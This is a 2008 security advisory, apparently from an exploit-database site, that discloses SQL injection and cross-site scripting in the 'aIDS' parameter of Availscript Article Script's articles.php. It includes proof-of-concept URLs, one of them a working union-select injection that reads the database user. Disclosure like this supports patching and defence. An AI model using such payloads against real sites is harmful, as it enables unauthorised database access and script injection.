Availscript Article Script (articles.php) Multiple Vulnerabilities

2008.10.02
Credit: sl4xUz
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

########################################################### # # ___ __ __ __ __ # /\_ \ /\ \\ \ /\ \/\ \ # ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ # /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ # /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ # \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ # \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ # # security breakd0wn! ########################################################### # # Title: Availscript Article Script (articles.php) Multiple Vulnerabilities # Vendor: http://www.availscript.com/ # Vulnerable Version: N/A # Fix: N/A # ########################################################### # # c0ntact: sl4x.xuz[at]gmail[dot]com # d0rk: "assh0le" # stop lammo # ########################################################### ###################### 1. Information ###################### Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles. ###################### 2. Vulnerabilities ###################### SQL Injection in "articles.php" in the "aIDS" parameter. Cross Site Scripting in "articles.php" in the "aIDS" parameter. ###################### 3. PoC ###################### http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()-- http://localhost/path/articles.php?aIDS=[XSS] ###########################################################

References:

http://www.securityfocus.com/bid/31095
http://www.milw0rm.com/exploits/6409


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top